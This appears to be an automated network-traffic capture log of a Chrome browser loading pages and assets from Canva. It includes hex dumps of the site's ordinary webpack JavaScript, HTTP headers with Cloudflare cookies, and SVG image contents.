                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC1226INData Raw: 3b 2f 2f 20 5f 5f 46 49 4c 45 5f 43 4f 4e 54 45 4e 54 5f 46 4f 52 5f 5f 3a 35 37 35 36 61 30 33 30 34 39 38 66 38 30 66 30 2e 6a 73 0a 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 36 33 30 35 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 37 39 30 36 39 37 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f
                                                                                                                                                                                                                                                                    Data Ascii: ;// __FILE_CONTENT_FOR__:5756a030498f80f0.js(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[6305],{/***/ 790697:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC1369INData Raw: 7b 5f 5f 63 2e 74 28 6e 75 6c 6c 21 3d 61 2e 75 73 65 72 49 64 26 26 2f 5e 55 5b 61 2d 7a 41 2d 5a 30 2d 39 5f 2d 5d 7b 31 30 7d 24 2f 2e 74 65 73 74 28 61 2e 75 73 65 72 49 64 29 2c 22 47 65 74 50 72 69 76 61 63 79 50 72 65 66 65 72 65 6e 63 65 73 52 65 71 75 65 73 74 23 75 73 65 72 49 64 20 64 6f 65 73 20 6e 6f 74 20 6d 61 74 63 68 3a 20 55 5b 61 2d 7a 41 2d 5a 30 2d 39 5f 2d 5d 7b 31 30 7d 22 29 3b 63 6f 6e 73 74 20 62 3d 5f 5f 63 2e 62 7a 28 5b 5f 5f 63 2e 65 44 2c 22 70 72 69 76 61 63 79 70 72 65 66 65 72 65 6e 63 65 73 22 2c 61 2e 75 73 65 72 49 64 5d 29 3b 5f 5f 63 2e 61 7a 28 62 2c 7b 69 6e 63 6c 75 64 65 55 73 65 72 44 65 74 61 69 6c 73 3a 61 2e 53 51 61 2c 69 6e 63 6c 75 64 65 42 72 61 6e 64 4c 65 76 65 6c 45 6c 69 67 69 62 6c 65 3a 61 2e 76 6b
                                                                                                                                                                                                                                                                    Data Ascii: {__c.t(null!=a.userId&&/^U[a-zA-Z0-9_-]{10}$/.test(a.userId),"GetPrivacyPreferencesRequest#userId does not match: U[a-zA-Z0-9_-]{10}");const b=__c.bz([__c.eD,"privacypreferences",a.userId]);__c.az(b,{includeUserDetails:a.SQa,includeBrandLevelEligible:a.vk
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC1369INData Raw: 6f 6f 74 73 74 72 61 70 3d 61 7d 7d 3b 76 61 72 20 68 4e 63 3d 63 6c 61 73 73 7b 73 74 61 74 69 63 20 46 28 61 29 7b 5f 5f 63 2e 50 28 61 2c 7b 5a 69 61 3a 63 36 2c 51 37 3a 63 36 7d 29 7d 73 74 61 72 74 28 29 7b 74 68 69 73 2e 73 74 6f 72 65 26 26 74 68 69 73 2e 63 6c 69 65 6e 74 26 26 74 68 69 73 2e 63 6c 69 65 6e 74 2e 69 38 28 74 68 69 73 2e 73 74 6f 72 65 29 7d 5a 69 61 28 61 29 7b 74 68 69 73 2e 73 74 6f 72 65 26 26 74 68 69 73 2e 63 6c 69 65 6e 74 26 26 74 68 69 73 2e 63 6c 69 65 6e 74 2e 5a 69 61 28 74 68 69 73 2e 73 74 6f 72 65 2c 61 29 7d 51 37 28 61 29 7b 74 68 69 73 2e 73 74 6f 72 65 26 26 74 68 69 73 2e 63 6c 69 65 6e 74 26 26 74 68 69 73 2e 63 6c 69 65 6e 74 2e 51 37 28 74 68 69 73 2e 73 74 6f 72 65 2c 61 29 7d 63 6f 6e 73 74 72 75 63 74 6f
                                                                                                                                                                                                                                                                    Data Ascii: ootstrap=a}};var hNc=class{static F(a){__c.P(a,{Zia:c6,Q7:c6})}start(){this.store&&this.client&&this.client.i8(this.store)}Zia(a){this.store&&this.client&&this.client.Zia(this.store,a)}Q7(a){this.store&&this.client&&this.client.Q7(this.store,a)}constructo
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC1369INData Raw: 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 33 39 35 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 35 35 38 30 34 35 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 33 35 33 32 37 39 29 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 32 30 31 30 39 39 29 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 39
                                                                                                                                                                                                                                                                    Data Ascii: kChunk_canva_web"] || []).push([[2395],{/***/ 558045:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_req__(353279);__web_req__(201099);__web_req__(9
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC1369INData Raw: 61 2c 62 29 7b 61 3d 28 61 77 61 69 74 20 61 2e 64 62 29 2e 74 72 61 6e 73 61 63 74 69 6f 6e 28 5b 22 61 6e 61 6c 79 74 69 63 73 5f 65 76 65 6e 74 5f 76 32 22 5d 2c 22 72 65 61 64 77 72 69 74 65 22 29 3b 0a 63 6f 6e 73 74 20 63 3d 61 2e 6f 62 6a 65 63 74 53 74 6f 72 65 28 22 61 6e 61 6c 79 74 69 63 73 5f 65 76 65 6e 74 5f 76 32 22 29 2c 64 3d 5b 63 2e 69 6e 64 65 78 28 22 75 73 65 72 5f 69 64 5f 69 6e 64 65 78 22 29 2e 67 65 74 41 6c 6c 28 6e 75 6c 6c 21 3d 3d 62 26 26 76 6f 69 64 20 30 21 3d 3d 62 3f 62 3a 22 6e 75 6c 6c 22 29 5d 3b 62 26 26 64 2e 70 75 73 68 28 63 2e 69 6e 64 65 78 28 22 75 73 65 72 5f 69 64 5f 69 6e 64 65 78 22 29 2e 67 65 74 41 6c 6c 28 22 6e 75 6c 6c 22 29 29 3b 62 3d 28 62 3d 28 61 77 61 69 74 20 50 72 6f 6d 69 73 65 2e 61 6c 6c 28
                                                                                                                                                                                                                                                                    Data Ascii: a,b){a=(await a.db).transaction(["analytics_event_v2"],"readwrite");const c=a.objectStore("analytics_event_v2"),d=[c.index("user_id_index").getAll(null!==b&&void 0!==b?b:"null")];b&&d.push(c.index("user_id_index").getAll("null"));b=(b=(await Promise.all(
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC1369INData Raw: 61 6c 69 7a 65 2c 74 62 63 2e 64 65 73 65 72 69 61 6c 69 7a 65 2c 31 45 34 29 3b 72 65 74 75 72 6e 20 61 73 79 6e 63 20 64 3d 3e 7b 63 6f 6e 73 74 20 65 3d 61 28 64 29 2c 66 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 31 45 36 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 3b 61 77 61 69 74 20 5f 5f 63 2e 4f 43 28 28 29 3d 3e 62 28 66 2c 65 29 2c 35 45 33 29 2e 72 65 73 75 6c 74 3b 5f 5f 63 2e 4f 43 28 61 73 79 6e 63 28 29 3d 3e 7b 61 77 61 69 74 20 63 2e 70 75 74 28 65 2c 7b 74 4d 3a 66 2c 78 73 61 3a 44 61 74 65 2e 6e 6f 77 28 29 2b 31 31 45 33 7d 29 7d 2c 31 45 33 29 7d 7d 2c 76 62 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 6e 61 76 69 67 61 74 6f 72 2e 6c 6f 63 6b 73 2c 0a 62 3d 73 62 63 3b 72 65 74 75 72 6e 20 63 3d 3e 6e 65 77 20 50 72 6f 6d 69
                                                                                                                                                                                                                                                                    Data Ascii: alize,tbc.deserialize,1E4);return async d=>{const e=a(d),f=Math.floor(1E6*Math.random());await __c.OC(()=>b(f,e),5E3).result;__c.OC(async()=>{await c.put(e,{tM:f,xsa:Date.now()+11E3})},1E3)}},vbc=function(){var a=navigator.locks,b=sbc;return c=>new Promi
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC1369INData Raw: 2b 61 7c 7c 32 35 30 3d 3d 3d 64 2e 6c 65 6e 67 74 68 29 7b 62 2e 70 75 73 68 28 64 29 3b 69 66 28 32 3d 3d 3d 62 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 62 3b 64 3d 5b 5d 3b 63 3d 30 7d 64 2e 70 75 73 68 28 65 29 3b 63 2b 3d 61 7d 30 3c 64 2e 6c 65 6e 67 74 68 26 26 62 2e 70 75 73 68 28 64 29 3b 72 65 74 75 72 6e 20 62 7d 2c 44 62 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 63 2c 64 29 3d 3e 7b 63 6f 6e 73 74 20 65 3d 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 65 2e 6f 6e 6c 6f 61 64 3d 28 29 3d 3e 63 28 29 3b 65 2e 6f 6e 65 72 72 6f 72 3d 28 29 3d 3e 64 28 45 72 72 6f 72 28 22 46 61 69 6c 65 64 20 74 6f 20 6c 6f 61 64 20 55 52 4c 3a 20 22 2b 62 29 29
                                                                                                                                                                                                                                                                    Data Ascii: +a||250===d.length){b.push(d);if(2===b.length)return b;d=[];c=0}d.push(e);c+=a}0<d.length&&b.push(d);return b},Dbc=function(a,b){return new Promise((c,d)=>{const e=a.createElement("script");e.onload=()=>c();e.onerror=()=>d(Error("Failed to load URL: "+b))
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC1369INData Raw: 7d 29 3b 76 61 72 20 62 3d 61 2e 67 6c 6f 62 61 6c 2e 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 62 2e 69 64 3d 4a 62 63 3b 62 2e 73 72 63 3d 60 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 6d 2e 6a 73 3f 69 64 3d 24 7b 61 2e 63 6f 6e 66 69 67 2e 63 6f 6e 74 61 69 6e 65 72 49 64 7d 26 6c 3d 64 61 74 61 4c 61 79 65 72 60 3b 62 2e 61 73 79 6e 63 3d 21 30 3b 62 2e 6f 6e 65 72 72 6f 72 3d 28 29 3d 3e 7b 61 2e 73 74 6f 70 28 29 7d 3b 61 2e 67 6c 6f 62 61 6c 2e 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 62 29 7d 7d 2c 64 31 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 22 79 65 73 22 3a 22
                                                                                                                                                                                                                                                                    Data Ascii: });var b=a.global.document.createElement("script");b.id=Jbc;b.src=`https://www.googletagmanager.com/gtm.js?id=${a.config.containerId}&l=dataLayer`;b.async=!0;b.onerror=()=>{a.stop()};a.global.document.head.appendChild(b)}},d1=function(a){return a?"yes":"
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC1369INData Raw: 73 7b 73 74 61 74 69 63 20 6f 70 65 6e 28 61 29 7b 63 6f 6e 73 74 20 62 3d 6c 62 63 28 61 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 62 63 28 62 2c 61 29 7d 61 73 79 6e 63 20 70 75 74 28 61 29 7b 63 6f 6e 73 74 20 62 3d 28 61 77 61 69 74 20 74 68 69 73 2e 64 62 29 2e 74 72 61 6e 73 61 63 74 69 6f 6e 28 5b 22 61 6e 61 6c 79 74 69 63 73 5f 65 76 65 6e 74 5f 76 32 22 2c 22 61 6e 61 6c 79 74 69 63 73 5f 65 76 65 6e 74 5f 6d 65 74 61 64 61 74 61 22 5d 2c 22 72 65 61 64 77 72 69 74 65 22 29 2c 63 3d 62 2e 6f 62 6a 65 63 74 53 74 6f 72 65 28 22 61 6e 61 6c 79 74 69 63 73 5f 65 76 65 6e 74 5f 76 32 22 29 2c 64 3d 6e 62 63 28 61 29 3b 69 66 28 21 61 77 61 69 74 20 71 62 63 28 64 2c 62 29 29 74 68 72 6f 77 20 6e 65 77 20 51 62 63 3b 61 77 61 69 74 20 63 2e 70 75 74
                                                                                                                                                                                                                                                                    Data Ascii: s{static open(a){const b=lbc(a);return new Pbc(b,a)}async put(a){const b=(await this.db).transaction(["analytics_event_v2","analytics_event_metadata"],"readwrite"),c=b.objectStore("analytics_event_v2"),d=nbc(a);if(!await qbc(d,b))throw new Qbc;await c.put


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    93192.168.2.1249823104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:47 UTC1333OUTGET /web/images/8777e8ed572c4159d71b08cca2972b15.svg HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; cf_clearance=f7lju1RE1zdHiOCQL4i18liElZUAlfkVsP6AsyiJ9gk-1732114905-1.2.1.1-6UtwQ4hKGzF5NKxEfI9x5H88_Or4i7.rSV90jNTTLP87mMsuweOxf9DCO7S4n8Mh2iJJF9L5oIl_T_5Dx8gg4KoK9920foRVgkHwJQGftplwcLSoQDZfMfTIca8xp0dpsUJ9zfE0iLU70u4qgItL3UQgK1OsjsDSOLVtMFAUeTxp6tNbNlj_bzERU3hJsxAjxUcowpiF2NDp_.Wng209KNIlFsiCXNpusKjI9AF.xU.W9xNnzKrh.rCkOUQoNawmY4l7lOyfL_.UyhI_tB0ABRq6aO2FugZB72yAs_jk3sc0i8YRldipRimJJbxLPGEmDaFRtMnDyG_EpzNkkYrM.q82jCjLZrLTVnVRW.z5Qb2x6aOIKUUgi.CXD3zqOT20
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC1189INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:47 GMT
                                                                                                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                    Content-Length: 1525
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59513e18da43b5-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 1225324
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "8777e8ed572c4159d71b08cca2972b15"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:33 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 21 Aug 2024 01:04:39 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 22 Aug 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: uLWvWvQBIB3tPnM1a6GWrNOzpcwL324zaNAEpVGXnRy9cwdoCOPKs3Vx/7s8fI02BxnNjJwx+CQ=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: EGX1EGCJMZB9EHBE
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: jtMhEzsaRqm0hVKkxFqRP4cFVGMnDvLS
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC350INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 35 6b 43 61 65 72 6c 61 6e 52 78 65 44 45 33 41 4a 45 4a 4f 68 71 68 74 38 72 56 46 7a 48 25 32 46 47 64 59 32 61 4a 34 6a 6b 6f 72 79 33 36 78 78 53 6f 31 51 78 67 30 31 4e 46 70 59 53 65 69 6a 63 65 4f 39 65 74 38 62 25 32 46 66 53 6f 53 47 58 33 6f 55 79 38 4d 51 62 54 4a 4d 4a 69 73 32 61 30 31 5a 4e 54 6b 43 35 45 4a 51 58 66 6f 47 48 43 79 75 4f 4f 5a 25 32 42 46 6b 75 53 59 6e 50 59 77 4a 55 4e 44 41 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5kCaerlanRxeDE3AJEJOhqht8rVFzH%2FGdY2aJ4jkory36xxSo1Qxg01NFpYSeijceO9et8b%2FfSoSGX3oUy8MQbTJMJis2a01ZNTkC5EJQXfoGHCyuOOZ%2BFkuSYnPYwJUNDA%3D"}],"group":"cf-nel","max_age":604800
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC1199INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 33 36 20 33 36 22 3e 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 46 46 43 42 34 43 22 20 63 78 3d 22 31 38 22 20 63 79 3d 22 31 37 2e 30 31 38 22 20 72 3d 22 31 37 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 36 35 34 37 31 42 22 20 64 3d 22 4d 31 34 2e 35 32 34 20 32 31 2e 30 33 36 61 2e 39 31 34 2e 39 31 34 20 30 20 30 20 31 2d 2e 33 31 32 2d 2e 34 36 34 2e 37 39 39 2e 37 39 39 20 30 20 30 20 31 20 2e 35 39 2d 31 2e 30 32 31 63 34 2e 35 32 38 2d 31 2e 30 32 31 20 37 2e 35 37 37 20 31 2e 33 36 33 20 37 2e 37 30 36 20 31 2e 34 36 35 2e 33 38 34 2e 33 30 36 2e 34 35 39 2e 38 34 35 2e 31 37 33 20
                                                                                                                                                                                                                                                                    Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 36 36"><circle fill="#FFCB4C" cx="18" cy="17.018" r="17"/><path fill="#65471B" d="M14.524 21.036a.914.914 0 0 1-.312-.464.799.799 0 0 1 .59-1.021c4.528-1.021 7.577 1.363 7.706 1.465.384.306.459.845.173
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC326INData Raw: 38 34 33 2e 30 33 34 2e 34 33 33 2e 32 33 31 2e 36 30 38 2e 37 34 37 2e 33 39 31 20 31 2e 31 35 34 2d 2e 32 31 36 2e 34 30 35 2d 2e 37 34 2e 35 34 36 2d 31 2e 31 37 33 2e 33 31 38 2d 2e 31 32 33 2d 2e 30 36 33 2d 32 2e 38 33 32 2d 31 2e 34 33 32 2d 36 2e 32 37 38 2e 30 34 37 61 2e 39 31 35 2e 39 31 35 20 30 20 30 20 31 2d 2e 37 38 35 2d 2e 30 34 32 7a 6d 31 32 2e 31 33 35 20 33 2e 37 35 61 2e 39 32 34 2e 39 32 34 20 30 20 30 20 31 2d 2e 33 36 32 2d 2e 34 32 34 2e 38 2e 38 20 30 20 30 20 31 20 2e 34 36 38 2d 31 2e 30 38 34 63 34 2e 33 38 31 2d 31 2e 35 33 36 20 37 2e 36 38 35 2e 34 38 20 37 2e 38 32 33 2e 35 36 37 2e 34 31 35 2e 32 36 2e 35 35 35 2e 37 38 37 2e 33 31 32 20 31 2e 31 37 38 2d 2e 32 34 32 2e 33 39 2d 2e 37 37 36 2e 34 39 35 2d 31 2e 31 39 31
                                                                                                                                                                                                                                                                    Data Ascii: 843.034.433.231.608.747.391 1.154-.216.405-.74.546-1.173.318-.123-.063-2.832-1.432-6.278.047a.915.915 0 0 1-.785-.042zm12.135 3.75a.924.924 0 0 1-.362-.424.8.8 0 0 1 .468-1.084c4.381-1.536 7.685.48 7.823.567.415.26.555.787.312 1.178-.242.39-.776.495-1.191


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    94192.168.2.1249825104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:47 UTC1333OUTGET /web/images/aba10b640f15bb01b8e5f0b804eefc7f.svg HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; cf_clearance=f7lju1RE1zdHiOCQL4i18liElZUAlfkVsP6AsyiJ9gk-1732114905-1.2.1.1-6UtwQ4hKGzF5NKxEfI9x5H88_Or4i7.rSV90jNTTLP87mMsuweOxf9DCO7S4n8Mh2iJJF9L5oIl_T_5Dx8gg4KoK9920foRVgkHwJQGftplwcLSoQDZfMfTIca8xp0dpsUJ9zfE0iLU70u4qgItL3UQgK1OsjsDSOLVtMFAUeTxp6tNbNlj_bzERU3hJsxAjxUcowpiF2NDp_.Wng209KNIlFsiCXNpusKjI9AF.xU.W9xNnzKrh.rCkOUQoNawmY4l7lOyfL_.UyhI_tB0ABRq6aO2FugZB72yAs_jk3sc0i8YRldipRimJJbxLPGEmDaFRtMnDyG_EpzNkkYrM.q82jCjLZrLTVnVRW.z5Qb2x6aOIKUUgi.CXD3zqOT20
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC1188INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:47 GMT
                                                                                                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                    Content-Length: 1404
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59513e1d5fc34b-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 879123
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "aba10b640f15bb01b8e5f0b804eefc7f"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:33 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Tue, 10 Sep 2024 12:27:33 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Thu, 11 Sep 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: UkrsL4xawzULLeDr+NETBBdWKqUuCZB4cLGnA6j/rIq3UuAoWPMEeDNUrM2qH+d4c+NIdWdxriY=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: Q20KJYH02AJXT42Y
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: En5JsX.mH8GMn3opGhvkbwOFKb7w0bxF
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
